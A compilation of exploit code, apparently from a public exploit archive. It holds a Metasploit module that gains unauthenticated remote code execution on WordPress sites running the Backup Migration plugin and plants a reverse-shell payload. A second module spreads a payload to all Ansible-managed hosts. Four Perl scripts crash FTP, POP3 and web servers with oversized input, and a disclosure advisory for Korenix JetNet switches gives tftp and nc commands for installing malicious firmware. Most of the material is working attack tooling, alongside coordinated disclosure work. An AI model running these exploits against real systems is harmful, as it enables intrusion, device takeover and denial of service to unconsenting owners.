<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::Remote::HTTP::Wordpress<br /> include Msf::Exploit::Remote::HTTP::PhpFilterChain<br /> include Msf::Exploit::FileDropper<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'WordPress Backup Migration Plugin PHP Filter Chain RCE',<br /> 'Description' => %q{<br /> This module exploits an unauth RCE in the WordPress plugin: Backup Migration (<= 1.3.7). The vulnerability is<br /> exploitable through the Content-Dir header which is sent to the /wp-content/plugins/backup-backup/includes/backup-heart.php endpoint.<br /><br /> The exploit makes use of a neat technique called PHP Filter Chaining which allows an attacker to prepend<br /> bytes to a string by continuously chaining character encoding conversions. This allows an attacker to prepend<br /> a PHP payload to a string which gets evaluated by a require statement, which results in command execution.<br /> },<br /> 'Author' => [<br /> 'Nex Team', # Vulnerability discovery<br /> 'Valentin Lobstein', # PoC<br /> 'jheysel-r7' # msfmodule<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'References' => [<br /> ['CVE', '2023-6553'],<br /> ['URL', 'https://github.com/Chocapikk/CVE-2023-6553/blob/main/exploit.py'],<br /> ['URL', 'https://www.synacktiv.com/en/publications/php-filters-chain-what-is-it-and-how-to-use-it'],<br /> ['WPVDB', '6a4d0af9-e1cd-4a69-a56c-3c009e207eca']<br /> ],<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'php/meterpreter/reverse_tcp'<br /> },<br /> 'Platform' => ['unix', 'linux', 'win', 'php'],<br /> 'Arch' => [ARCH_PHP],<br /> 'Targets' => [['Automatic', {}]],<br /> 'DisclosureDate' => '2023-12-11',<br /> 'DefaultTarget' => 0,<br /> 'Privileged' => false,<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /><br /> register_options(<br /> [<br /> OptString.new('PAYLOAD_FILENAME', [ true, 'The filename for the payload to be used on the target host (%RAND%.php by default)', Rex::Text.rand_text_alpha(4) + '.php']),<br /> ]<br /> )<br /> end<br /><br /> def check<br /> return CheckCode::Unknown unless wordpress_and_online?<br /><br /> wp_version = wordpress_version<br /> print_status("WordPress Version: #{wp_version}") if wp_version<br /><br /> # The plugin's official name seems to be Backup Migration however the package filename is "backup-backup"<br /> check_code = check_plugin_version_from_readme('backup-backup', '1.3.8')<br /><br /> if check_code.code != 'appears'<br /> return CheckCode::Safe<br /> end<br /><br /> plugin_version = check_code.details[:version]<br /> print_good("Detected Backup Migration Plugin version: #{plugin_version}")<br /> CheckCode::Appears<br /> end<br /><br /> def send_payload(payload)<br /> php_filter_chain_payload = generate_php_filter_payload(payload)<br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'wp-content', 'plugins', 'backup-backup', 'includes', 'backup-heart.php'),<br /> 'method' => 'POST',<br /> 'headers' => {<br /> 'Content-Dir' => php_filter_chain_payload<br /> }<br /> )<br /> fail_with(Failure::Unreachable, 'Connection failed') if res.nil?<br /> fail_with(Failure::UnexpectedReply, 'The server did not respond with the expected 200 response code') unless res.code == 200<br /> end<br /><br /> def write_to_payload_file(string_to_write)<br /> # Because the payload is base64 encoded and then each character is translated into it's corresponding php filter chain,<br /> # the payload becomes quite large and we start to hit limitations due to the HTTP header size.<br /> # For example this payload: "<?php fwrite(fopen("G", "a"),"\x73");?>", ends up being 7721 characters long.<br /> # The payload size limit on the target I was testing seemed to be around 8000 characters.<br /> # Using the following: <?php file_put_contents("file.php","char",FILE_APPEND);?> (more elegant solution) exceeds the<br /> # size limit which is why I ended up using <?php fwrite(fopen("<single_char_filename>", "char" ?> and then after<br /> # copying the single_char_filename to a filename with a .php extension to be executed.<br /><br /> single_char_filename = Rex::Text.rand_text_alpha(1)<br /> string_to_write.each_char do |char|<br /> send_payload("<?php fwrite(fopen(\"#{single_char_filename}\",\"a\"),\"#{'\\x' + char.unpack('H2')[0]}\");?>")<br /> end<br /> register_file_for_cleanup(single_char_filename)<br /> send_payload("<?php copy(\"#{single_char_filename}\",\"#{datastore['PAYLOAD_FILENAME']}\");?>")<br /> register_file_for_cleanup(datastore['PAYLOAD_FILENAME'])<br /> end<br /><br /> def trigger_payload_file<br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'wp-content', 'plugins', 'backup-backup', 'includes', datastore['PAYLOAD_FILENAME']),<br /> 'method' => 'GET'<br /> )<br /> print_warning('The application responded to the request to trigger the payload, this is unexpected. Something may have gone wrong.') if res<br /> end<br /><br /> def exploit<br /> print_status('Writing the payload to disk, character by character, please wait...')<br /> # Use double quotes in the payload, not single.<br /> write_to_payload_file("<?php #{payload.encoded}")<br /> trigger_payload_file<br /> end<br />end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Local<br /> Rank = GoodRanking<br /><br /> include Msf::Post::File<br /> include Msf::Exploit::EXE<br /> include Msf::Exploit::FileDropper<br /> include Msf::Exploit::Local::Ansible<br /><br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Ansible Agent Payload Deployer',<br /> 'Description' => %q{<br /> This exploit module creates an ansible module for deployment to nodes in the network.<br /> It creates a new yaml playbook which copies our payload, chmods it, then runs it on all<br /> targets which have been selected (default all).<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'h00die', # msf module<br /> 'n0tty' # original PoC, analysis<br /> ],<br /> 'Platform' => [ 'linux' ],<br /> 'Stance' => Msf::Exploit::Stance::Passive,<br /> 'Arch' => [ ARCH_X86, ARCH_X64 ],<br /> 'SessionTypes' => [ 'shell', 'meterpreter' ],<br /> 'Targets' => [[ 'Auto', {} ]],<br /> 'Privileged' => true,<br /> 'References' => [<br /> [ 'URL', 'https://github.com/n0tty/Random-Hacking-Scripts/blob/master/pwnsible.sh'],<br /> [ 'URL', 'https://web.archive.org/web/20180220031610/http://n0tty.github.io/2017/06/11/Enterprise-Offense-IT-Operations-Part-1'],<br /> ],<br /> 'DisclosureDate' => '2017-06-12', # pwnsible script but prob way before that<br /> 'DefaultTarget' => 0,<br /> 'Passive' => true, # this allows us to get multiple shells calling home<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [CONFIG_CHANGES, ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /> register_options [<br /> OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),<br /> OptString.new('HOSTS', [ true, 'Which ansible hosts to target', 'all' ]),<br /> OptBool.new('CALCULATE', [ true, 'Calculate how many boxes will be attempted', true ]),<br /> OptString.new('TargetWritableDir', [ true, 'A directory where we can write files on targets', '/tmp' ]),<br /> OptInt.new('ListenerTimeout', [ true, 'The maximum number of seconds to wait for new sessions', 60 ])<br /> ]<br /> end<br /><br /> def module_contents(payload_name)<br /> # The `name` field in `tasks` is a required field, and it gets logged, so randomizing may be a little too obvious, I've opted for just numbers in this case.<br /> "- name: #{Rex::Text.rand_text_numeric(3..6)}<br /> hosts: #{datastore['HOSTS']}<br /> remote_user: root<br /> tasks:<br /> - name: 1<br /> ansible.builtin.copy:<br /> src: #{datastore['WritableDir']}/#{payload_name}<br /> dest: #{datastore['TargetWritableDir']}/#{payload_name}<br /> - name: 2<br /> ansible.builtin.file:<br /> path: #{datastore['TargetWritableDir']}/#{payload_name}<br /> owner: root<br /> group: root<br /> mode: '0700'<br /> - name: 3<br /> command: #{datastore['TargetWritableDir']}/#{payload_name}<br /> - name: 4<br /> file:<br /> path: #{datastore['TargetWritableDir']}/#{payload_name}<br /> state: absent<br />"<br /> end<br /><br /> def check<br /> return CheckCode::Safe('Ansible does not seem to be installed, unable to find ansible executable') if ansible_playbook_exe.nil?<br /><br /> CheckCode::Appears('ansible playbook executable found')<br /> end<br /><br /> def ping_hosts_print<br /> results = ping_hosts<br /> if results.nil?<br /> print_error('Unable to parse ping hosts results')<br /> return<br /> end<br /><br /> columns = ['Host', 'Status', 'Ping', 'Changed']<br /> table = Rex::Text::Table.new('Header' => 'Ansible Pings', 'Indent' => 1, 'Columns' => columns)<br /><br /> count = 0<br /> results.each do |match|<br /> table << [match['host'], match['status'], match['ping'], match['changed']]<br /> count += 1 if match['ping'] == 'pong'<br /> end<br /> print_good(table.to_s) unless table.rows.empty?<br /> # give the user a few seconds to cancel if its too many etc<br /> print_good("#{count} ansible hosts were pingable, and will attempt to execute payload. If this isn't an expected volume (too many), ctr+c to halt execution. Pausing 10 seconds.")<br /> Rex.sleep(10)<br /> end<br /><br /> def exploit<br /> # Make sure we can write our exploit and payload to the local system<br /> fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable" unless writable? datastore['WritableDir']<br /> ping_hosts_print if datastore['CALCULATE']<br /><br /> payload_name = rand_text_alphanumeric(5..10)<br /> module_name = rand_text_alphanumeric(5..10)<br /><br /> print_status('Creating yaml job to execute')<br /> yaml_file = "#{datastore['WritableDir']}/#{module_name}.yaml"<br /> write_file(yaml_file, module_contents(payload_name))<br /> register_file_for_cleanup(yaml_file)<br /> print_status('Writing payload')<br /> upload_and_chmodx "#{datastore['WritableDir']}/#{payload_name}", generate_payload_exe<br /> register_file_for_cleanup("#{datastore['WritableDir']}/#{payload_name}") # cleanup payload on host, not targets<br /> print_status('Executing ansible job')<br /> resp = cmd_exec("#{ansible_playbook_exe} #{yaml_file}")<br /> playbook_log = store_loot('ansible.playbook.log', 'text/plain', session, resp, 'ansible.playbook.log', 'Ansible playbook log')<br /> print_good("Stored run logs to: #{playbook_log}")<br /> # stolen from exploit/multi/handler<br /> stime = Time.now.to_f<br /> timeout = datastore['ListenerTimeout'].to_i<br /> loop do<br /> break if timeout > 0 && (stime + timeout < Time.now.to_f)<br /><br /> Rex::ThreadSafe.sleep(1)<br /> end<br /> end<br /><br />end<br /></code></pre>
<pre><code>#!/usr/bin/perl<br /><br />use IO::Socket::INET;<br /><br /># Exploit Title: SpyCamLizard 1.230 - Denial of Service (DoS)<br /># Discovery by: Fernando Mengali<br /># Discovery Date: 18 january 2024<br /># Vendor Homepage: http://www.spycamlizard.com<br /># Download to demo: https://drive.google.com/file/d/1daFgHh0VzbkDzIp41-imZbPoc6ETZDq2/view?usp=sharing<br /># Notification vendor: Yes reported<br /># Tested Version: SpyCamLizard 1.230 - Denial of Service (DoS)<br /># Tested on: Window XP Professional - Service Pack 2 and 3 - English<br /># Vulnerability Type: Denial of Service (DoS)<br /># Vídeo: https://youtu.be/Ksg8L-ZX2Us<br /><br />#1. Description<br /><br />#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).<br />#For this exploit I have tried several strategies to increase reliability and performance:<br />#Jump to a static 'call esp'<br />#Backwards jump to code a known distance from the stack pointer.<br />#The SpyCamLizard does not correctly handle the amount of data or bytes sent.<br />#When authenticating to the SpyCamLizard with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing denial of service conditions.<br />#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.<br /><br />#2. Proof of Concept - PoC<br /><br /> $sis="$^O";<br /><br /> if ($sis eq "windows"){<br /> $cmd="cls";<br /> } else {<br /> $cmd="clear";<br /> }<br /><br /> system("$cmd");<br /> <br /> intro();<br /> main();<br /> <br /> print "[+] Exploiting... \n";<br /><br />print "[+] Connecting to $ip:$port\n";<br />my $exploit = "x41" x 3000;<br /><br />my $httpsocket = IO::Socket::INET->new(<br /> PeerAddr => $host,<br /> PeerPort => $port,<br /> Proto => "tcp",<br />);<br />$httpsocket->send("GET " . $exploit . " HTTP/1.0\r\n\r\n");<br />$httpsocket->close();<br /><br /> print "[+] Done - Exploited success!!!!!\n\n";<br /> <br /> sub intro {<br /> print q {<br /><br /> ,--,<br /> _ ___/ /\|<br /> ,;'( )__, ) ~<br /> // // '--; <br /> ' \ | ^<br /> ^ ^<br /><br /> [+] SpyCamLizard 1.230 - Denial of Service (DoS)<br /><br /> [*] Coded by Fernando Mengali<br /><br /> [@] e-mail: fernando.mengalli@gmail.com<br /><br /> }<br /> }<br /><br /> sub main {<br /><br />our ($ip, $port) = @ARGV;<br /><br /> unless (defined($ip) && defined($port)) {<br /><br /> print " \nUsage: $0 <ip> <port> \n";<br /> exit(-1);<br /><br /> }<br /> }<br /></code></pre>
<pre><code>#!/usr/bin/perl<br /><br /><br />use Net::FTP;<br /><br /># Exploit Title: Easy File Sharing FTP Server 3.6 - Denial of Service (DoS)<br /># Discovery by: Fernando Mengali<br /># Discovery Date: 17 january 2024<br /># Vendor Homepage: N/A<br /># Download to demo: <br /># Notification vendor: No reported<br /># Tested Version: Easy File Sharing FTP Server 3.6<br /># Tested on: Window XP Professional - Service Pack 2 and 3 - English<br /># Vulnerability Type: Denial of Service (DoS)<br /># Vídeo: https://www.youtube.com/watch?v=U2svu2FiIVc<br /><br />#1. Description<br /><br />#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).<br />#For this exploit I have tried several strategies to increase reliability and performance:<br />#Jump to a static 'call esp'<br />#Backwards jump to code a known distance from the stack pointer.<br />#The server does not correctly handle the amount of data or bytes of the password entered by the user.<br />#When authenticating to the FTP server with a long password or a password with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing denial of service conditions.<br />#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.<br /><br />#2. Proof of Concept - PoC<br /><br /> $sis="$^O";<br /><br /> if ($sis eq "windows"){<br /> $cmd="cls";<br /> } else {<br /> $cmd="clear";<br /> }<br /><br /> system("$cmd");<br /> <br /> intro();<br /> main();<br /> <br /> print "[+] Exploiting... \n";<br /><br /> my $payload = "\x2c";<br /> $payload .= "A"x2000;<br /> $payload .= "\x41"x610;<br /><br /> my $ftp = Net::FTP->new($ip, Debug => 0) or die "Não foi possível se conectar ao servidor: $@";<br /><br /> $ftp->login("anonymous",$payload) or die "[+] Possibly exploited!"; <br /><br /> $ftp->quit;<br /><br /> print "[+] Done - Exploited success!!!!!\n\n";<br /> <br /> sub intro {<br /> print "######################################################################\n";<br /> print "# Easy File Sharing FTP Server 3.6 - Denied of Service #\n";<br /> print "# #\n";<br /> print "# Coded by Fernando Mengali #\n";<br /> print "# #\n";<br /> print "# e-mail: fernando.mengalli\@gmail.com #\n";<br /> print "# #\n";<br /> print "######################################################################\n";<br /> }<br /><br /> sub main {<br /><br />our ($ip, $port) = @ARGV;<br /><br /> unless (defined($ip) && defined($port)) {<br /><br /> print " \nUsage: $0 <ip> <port> \n";<br /> exit(-1);<br /><br /> }<br /> }<br /><br />#3. Solution/ How to fix:<br /><br /># This version product is deprecated<br /></code></pre>
<pre><code>#!/usr/bin/perl<br /><br />use IO::Socket::INET<br /><br /># Exploit Title: MailCarrier 2.51 - Denial of Service (DoS)<br /># Discovery by: Fernando Mengali<br /># Discovery Date: 16 january 2024<br /># Tested Version: MailCarrier 2.51<br /># Tested on: Window XP Professional - Service Pack 2 and 3 - English<br /># Vulnerability Type: Denial of Service (DoS)<br /><br />#1. Description<br /><br />#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).<br />#For this exploit I have tried several strategies to increase reliability and performance:<br />#Jump to a static 'call esp'<br />#Backwards jump to code a known distance from the stack pointer.<br />#The server does not correctly handle the amount of data or bytes of the USERNAME entered by the user.<br />#When authenticating to the POP3 server with a long USERNAME or a USERNAME with a large number of characters for the POP3 server to process, the server will crash as soon as it is received and processed, causing denial of service conditions.<br />#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.<br /><br />#2. Proof of Concept - PoC<br /><br /> $sis="$^O";<br /><br /> if ($sis eq "windows"){<br /> $cmd="cls";<br /> } else {<br /> $cmd="clear";<br /> }<br /><br /> system("$cmd");<br /> <br /> intro();<br /> main();<br /> <br /> print "[+] Exploiting... \n";<br /><br /> my $buf = "\x41" x 6000;<br /><br /><br /> my $s = IO::Socket::INET->new(<br /> PeerAddr => $ip,<br /> PeerPort => $port,<br /> Proto => 'tcp'<br /> ) or die "Unable to connect: $!\n";<br /><br /> $s->recv(my $data, 1024); # Grab banners (if any)<br /> $s->send('USER ' . $buf . "\r\n");<br /> $s->recv(my $response, 1024);<br /> $s->send("QUIT\r\n");<br /> $s->close();<br /><br /> print "[+] Done - Exploited success!!!!!\n\n";<br /> <br /> sub intro {<br /> print q {<br /><br /> ,--,<br /> _ ___/ /\|<br /> ,;'( )__, ) ~<br /> // // '--; <br /> ' \ | ^<br /> ^ ^<br /><br /> [+] MailCarrier 2.51 - Denial of Service (DoS)<br /><br /> [*] Coded by Fernando Mengali<br /><br /> [@] e-mail: fernando.mengalli@gmail.com<br /><br /> }<br /> }<br /><br /> sub main {<br /><br />our ($ip, $port) = @ARGV;<br /><br /> unless (defined($ip) && defined($port)) {<br /><br /> print " \nUsage: $0 <ip> <port> \n";<br /> exit(-1);<br /><br /> }<br /> }<br /><br />#3. Solution/ How to fix:<br /><br /># This version product is deprecated<br /></code></pre>
<pre><code>#!/usr/bin/perl<br /><br /><br />use Net::FTP;<br /><br /># Exploit Title: LightFTP 1.1 - Denial of Service (DoS)<br /># Discovery by: Fernando Mengali<br /># Discovery Date: 15 january 2024<br /># Vendor Homepage: N/A<br /># Notification vendor: No reported<br /># Tested Version: LightFTP 1.1<br /># Tested on: Window XP Professional - Service Pack 2 and 3 - English<br /># Vulnerability Type: Denial of Service (DoS)<br /><br />#1. Description<br /><br />#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).<br />#For this exploit I have tried several strategies to increase reliability and performance:<br />#Jump to a static 'call esp'<br />#Backwards jump to code a known distance from the stack pointer.<br />#The server does not correctly handle the amount of data or bytes of the USERNAME entered by the user.<br />#When authenticating to the FTP server with a long USERNAME or a USERNAME with a large number of characters for the FTP server to process, the server will crash as soon as it is received and processed, causing denial of service conditions.<br />#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.<br /><br />#2. Proof of Concept - PoC<br /><br /> $sis="$^O";<br /><br /> if ($sis eq "windows"){<br /> $cmd="cls";<br /> } else {<br /> $cmd="clear";<br /> }<br /><br /> system("$cmd");<br /> <br /> intro();<br /> main();<br /> <br /> print "[+] Exploiting... \n";<br /><br /> my $payload = "\x41"x500; <br /><br /> my $ftp = Net::FTP->new($ip, Debug => 0) or die "Não foi possível se conectar ao servidor: $@";<br /><br /> $ftp->login($payload,"anonymous") or die "[+] Possibly exploited!"; <br /><br /> $ftp->quit;<br /><br /> print "[+] Done - Exploited success!!!!!\n\n";<br /> <br /> sub intro {<br /> print q {<br /><br /> ,--,<br /> _ ___/ /\|<br /> ,;'( )__, ) ~<br /> // // '--; <br /> ' \ | ^<br /> ^ ^<br /><br /> [+] LightFTP 1.1 - Denial of Service (DoS)<br /><br /> [*] Coded by Fernando Mengali<br /><br /> [@] e-mail: fernando.mengalli@gmail.com<br /><br /> }<br /> }<br /><br /> sub main {<br /><br />our ($ip, $port) = @ARGV;<br /><br /> unless (defined($ip) && defined($port)) {<br /><br /> print " \nUsage: $0 <ip> <port> \n";<br /> exit(-1);<br /><br /> }<br /> }<br /><br />#3. Solution/ How to fix:<br /><br /># This version product is deprecated<br /></code></pre>
<pre><code>CyberDanube Security Research 20240109-0<br />-------------------------------------------------------------------------------<br /> title| Multiple Vulnerabilities<br /> product| Korenix JetNet Series<br /> vulnerable version| See "Vulnerable versions"<br /> fixed version| -<br /> CVE number| CVE-2023-5376, CVE-2023-5347<br /> impact| High<br /> homepage| https://www.korenix.com/<br /> found| 2023-08-31<br /> by| S. Dietz (Office Vienna)<br /> | CyberDanube Security Research<br /> | Vienna | St. Pölten<br /> |<br /> | https://www.cyberdanube.com<br />-------------------------------------------------------------------------------<br /><br />Vendor description<br />-------------------------------------------------------------------------------<br />"Korenix Technology, a Beijer group company within the Industrial Communication<br />business area, is a global leading manufacturer providing innovative, market-<br />oriented, value-focused Industrial Wired and Wireless Networking Solutions.<br />With decades of experiences in the industry, we have developed various product<br />lines [...].<br /><br />Our products are mainly applied in SMART industries: Surveillance, Machine-to-<br />Machine, Automation, Remote Monitoring, and Transportation. Worldwide customer<br />base covers different Sales channels, including end-customers, OEMs, system<br />integrators, and brand label partners. [...]"<br /><br />Source: https://www.korenix.com/en/about/index.aspx?kind=3<br /><br /><br />Vulnerable versions<br />-------------------------------------------------------------------------------<br />Tested on emulated Korenix JetNet 5310G / v2.6<br /><br />All vulnerable models/versions according to vendor:<br />JetNet 4508 (4508i-w V1.3, 4508 V2.3, 4508-w V2.3)<br />JetNet 4508f, 4508if (4508if-s V1.3,4508if-m V1.3, 4508if-sw V1.3,<br /> 4508if-mw V1.3, 4508f-m V2.3, 4508f-s V2.3, 4508f-mw V2.3,<br /> 4508f-sw V2.3)<br />JetNet 5620G-4C V1.1<br />JetNet 5612GP-4F V1.2<br />JetNet 5612G-4F V1.2<br />JetNet 5728G (5728G-24P-AC-2DC-US V2.1, 5728G-24P-AC-2DC-EU V2.0)<br />JetNet 528Gf (6528Gf-2AC-EU V1.0, 6528Gf-2AC-US V1.0, 6528Gf-2DC24 V1.0,<br /> 6528Gf-2DC48 V1.0, 6528Gf-AC-EU V1.0, 6528Gf-AC-US V1.0)<br />JetNet 6628XP-4F-US V1.1<br />JetNet 6628X-4F-EU V1.0<br />JetNet 6728G (6728G-24P-AC-2DC-US V1.1, 6728G-24P-AC-2DC-EU V1.1)<br />JetNet 6828Gf (6828Gf-2DC48 V1.0, 6828Gf-2DC24 V1.0, 6828Gf-AC-DC24-US V1.0,<br /> 6828Gf-2AC-US V1.0, 6828Gf-AC-US V1.0, 6828Gf-2AC-AU V1.0,<br /> 6828Gf-AC-DC24-EU V1.0, 6828Gf-2AC-EU V1.0)<br />JetNet 6910G-M12 HVDC V1.0<br />JetNet 7310G-V2 2.0<br />JetNet 7628XP-4F-US V1.0, 7628XP-4F-US V1.1, 7628XP-4F-EU V1.0,<br /> 7628XP-4F-EU V1.1<br />JetNet 7628X-4F-US V1.0, 7628X-4F-EU V1.0<br />JetNet 7714G-M12 HVDC V1.0<br /><br /><br />Vulnerability overview<br />-------------------------------------------------------------------------------<br />1) TFTP Without Authentication (CVE-2023-5376)<br />The available tftp service is accessable without user authentication. This<br />allows the user to upload and download files to the restricted "/home" folder.<br /><br />2) Unauthenticated Firmware Upgrade (CVE-2023-5347)<br />A critical security vulnerability has been identified that may allow an<br />unauthenticated attacker to compromise the integrity of a device or cause a<br />denial of service (DoS) condition. This vulnerability resides in the firmware<br />upgrade process of the affected system.<br /><br /><br />Proof of Concept<br />-------------------------------------------------------------------------------<br />1) TFTP Without Authentication (CVE-2023-5376)<br />The Linux tftp client was used to upload a firmware to the absolute path<br />"/home/firmware.bin":<br /><br /># tftp $IP<br />tftp> put exploit.bin /home/firmware.bin<br />Sent 5520766 bytes in 5.7 seconds<br /><br /><br />2) Unauthenticated Firmware Upgrade (CVE-2023-5347)<br />Unauthenticated attackers can exploit this by uploading malicious firmware via<br />TFTP and initializing the upgrade process with a crafted UDP packet on port<br />5010.<br /><br />We came to the conclusion that the firmware image consists of multiple<br />sections. Our interpretation of these can be seen below:<br /><br />===============================================================================<br />class FirmwarePart:<br /> def init(self, name, offset, size):<br /> self.name = name<br /> self.offset = offset<br /> self.size = size<br /><br />firmware_parts = [<br /> FirmwarePart("uimage_header", 0x0, 0x40),<br /> FirmwarePart("uimage_kernel", 0x40, 0x3c54),<br /> FirmwarePart("gzip", 0x3c94, 0x14a000 - 0x3c94),<br /> FirmwarePart("squashfs", 0x14a000, 0x539000 - 0x14a000),<br /> FirmwarePart("metadata", 0x539000, 5480448 - 0x539000),<br />]<br />===============================================================================<br /><br />The squashfs includes the rootfs. Metadata includes a 4 byte checksum which<br />needs to be modified when repacked. During our analysis we observed that the<br />checksum gets calculated over all sections except metadata. To test this<br />vulnerability we reimplemented the checksum calculation at offset 0x9bdc in<br />the binary "/bin/cmd-server2":<br /><br />===============================================================================<br />#include <stdio.h><br />#include <stdint.h><br />#include <stdlib.h><br /><br />int32_t check_file(const char* arg1) {<br /> FILE* r0 = fopen(arg1, "rb");<br /><br /> if (!r0) {<br /> return 0xffffffff;<br /> }<br /><br /> int32_t filechecksum = 0;<br /> int32_t last_data_size = 0;<br /> int32_t file_size = 0;<br /> uint8_t data_buf[4096];<br /> int32_t data_len = 1;<br /><br /> while (data_len > 0) {<br /> data_len = fread(data_buf, 1, sizeof(data_buf), r0);<br /><br /> if (data_len == 0) {<br /> break;<br /> }<br /><br /> int32_t counter = 0;<br /> while (counter < (data_len >> 2)) {<br /> int32_t byte_at_counter = *((int32_t*)(data_buf + (counter << 2)));<br /> counter++;<br /> filechecksum += byte_at_counter;<br /> }<br /><br /> file_size += data_len;<br /> last_data_size = data_len;<br /> }<br /><br /> fclose(r0);<br /><br /> if (last_data_size < 0x400 || (last_data_size >= 0x400 && (file_size - 0x14a<br /> 000) > 0x5ac000)) {<br /> return 0xffffffff;<br /> }<br /><br /> data_len = 0;<br /> while (data_len < (last_data_size >> 2)) {<br /> int32_t r3_2 = *((int32_t*)(data_buf + (data_len << 2)));<br /> data_len++;<br /> filechecksum -= r3_2;<br /> }<br /><br /> return filechecksum;<br />}<br /><br />int main(int argc, char* argv[]) {<br /> if (argc != 2) {<br /> printf("Usage: %s <file_path>\n", argv[0]);<br /> return 1;<br /> }<br /><br /> int32_t result = check_file(argv[1]);<br /> printf("0x%x\n", result);<br /><br /> return 0;<br />}<br />===============================================================================<br /><br />After modifying and repacking the squashfs, we calculated the checksum,<br />patched the required bytes in the metadata section (offset 0x11b-0x11e) and<br />initilized the update process.<br /><br />===============================================================================<br /># tftp $IP<br />tftp> put exploit.bin /home/firmware.bin<br />Sent 5520766 bytes in 5.7 seconds<br /><br /># echo -e "\x00\x00\x00\x1f\x00\x00\x00\x01\x01" | nc -u $IP 5010<br />===============================================================================<br /><br />The output of the serial console can be observed below:<br />===============================================================================<br />Jan 1 00:01:00 Jan 1 00:01:00 syslog: UDP cmd is received<br />Jan 1 00:01:00 Jan 1 00:01:00 syslog: management vlan = sw0.0<br />Jan 1 00:01:00 Jan 1 00:01:00 syslog: setsockopt(SO_BINDTODEVICE) No such devi<br />Jan 1 00:01:00 Jan 1 00:01:00 syslog: tlv_count = 0<br />Jan 1 00:01:00 Jan 1 00:01:00 syslog: rec_bytes = 10<br />Jan 1 00:01:00 Jan 1 00:01:00 syslog: command TLV_FW_UPGRADE received<br />check firmware...<br />checksum=b2256313, inFileChecksum=b2256313<br />Firmware upgrading, don't turn off the switch!<br />Begin erasing flash:<br />.<br />Write firmware.bin (5480448 Bytes) to flash:<br />...<br />Write finished...<br />Terminating child processes...<br />Jan 1 00:01:01 Jan 1 00:01:01 syslog: first time create tlv_chain<br />Jan 1 00:01:01 syslogd exiting<br />Firmware upgrade success!!<br />waiting for reboot command .......<br />===============================================================================<br /><br />The vulnerabilities were manually verified on an emulated device by using the<br />MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).<br /><br /><br />Solution<br />-------------------------------------------------------------------------------<br />Beijer/Korenix provided a workaround to mitigate the vulnerabilities until a<br />proper patch is available (see "Workaround" section).<br /><br /><br />Workaround<br />-------------------------------------------------------------------------------<br />Beijer representatives provided the following workaround for mitigating the<br />vulnerabilities on devices of the JetNet series:<br />"Login by terminal:<br /><br />Switch# configure terminal<br /><br />Switch(config)# service ipscan disable<br /><br />Switch(config)# tftpd disable<br /><br />Switch(config)# copy running-config startup-config<br />"<br />Source: https://www.beijerelectronics.com/en/support/Help___online?docId=69947<br /><br />This commands should be used to deactivate the TFTP daemon on the device to<br />prevent unauthenticated actors from abusing the service.<br /><br />Recommendation<br />-------------------------------------------------------------------------------<br />Regardless to the current state of the vulnerability, CyberDanube recommends<br />customers from Korenix to upgrade the firmware to the latest version available.<br />Furthermore, a full security review by professionals is recommended.<br /><br /><br />Contact Timeline<br />-------------------------------------------------------------------------------<br />31-08-2023: Contacting Beijer Electronics Group via cs@beijerelectronics.com.<br />31-08-2023: Receiving contact information. Send vulnerability information.<br />26-09-2023: Asking about vulnerability status and receiving update release date.<br />27-10-2023: Received update from contact regarding the firmware update.<br />29-11-2023: Meeting with contact stating that it effects the whole series.<br />31-11-2023: Meeting to discuss potential solutions.<br />11-12-2023: Release delayed due to lack of workaround from manufacturer.<br />21-12-2023: Manufacturer provides workaround. Release date confirmed.<br />09-01-2024: Coordinated release of security advisory.<br /><br />Web: https://www.cyberdanube.com<br />Twitter: https://twitter.com/cyberdanube<br />Mail: research at cyberdanube dot com<br /><br />EOF Sebastian Dietz / @2024<br /><br /></code></pre>
